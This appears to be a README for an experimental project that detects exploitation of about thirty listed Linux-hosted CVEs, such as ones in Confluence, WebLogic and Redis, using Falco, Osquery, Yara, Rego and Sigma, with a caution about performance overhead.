Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma
This is an experimental project to evaluate possible ways to detect exploits (CVE) in a Linux environment (HOST/Container/Cloud) using
ebpfbased - Falco Runtime Security- Analytic + Memory based - Osquery + Yara
- Policy based - Rego + OPA/ Aquasec-Tracee
- Log based - Sigma
We were able to detect the majority of the exploits through ebpf or kprobe instrumentation by analyzing the syscalls. Both Falco and Rego approaches worked accurately in Host & Containerized environments. However, there are a few limitations in all of the above approaches, stay tuned - the blog coming out soon.
- CVE-2022-36804 - Atlassian-Bitbucket
- CVE-2022-26134 - Atlassian-Confluence
- CVE-2021-26084 - Atlassian-Confluence
- CVE-2021-26085 - Atlassian-Confluence
- CVE-2022-26138 - Atlassian-Confluence
- CVE-2023-22515 - Atlassian-Confluence
- CVE-2022-24112 - Apache-APISIX
- CVE-2023-0669 - GoAnywhere-MFT
- CVE-2023-27350 - PaperCut
- CVE-2023-27351 - PaperCut
- CVE-2023-33246 - RocketMQ
- CVE-2022-29464 - WSO2
- CVE-2023-32007 - Apache-Spark
- CVE-2022-46169 - Cacti
- CVE-2022-24706 - CouchDB
- CVE-2021-22205 - Gitlab
- CVE-2022-44268 - ImageMagic
- CVE-2023-28432 - MinIO
- CVE-2023-32315 - Openfire
- CVE-2020-14883 - Oracle-Weblogic
- CVE-2021-2109 - Oracle-Weblogic
- CVE-2023-21839 - Oracle-Weblogic
- CVE-2022-0543 - Redis
- CVE-2022-35914 - Teclib-GLPI
- CVE-2022-26352 - dotCMS
- CVE-2023-38646 - Metabase
- CVE-2023-25826 - OpenTSDB
- CVE-2020-35476 - OpenTSDB
- CVE-2023-38633 - librsvg
More to come...
All of these detections were tested in a host & containerized environment where reproduced the exploit and captured required events. The rules in the repository can lead to performance overhead, we would suggest testing it before using it in a production environment.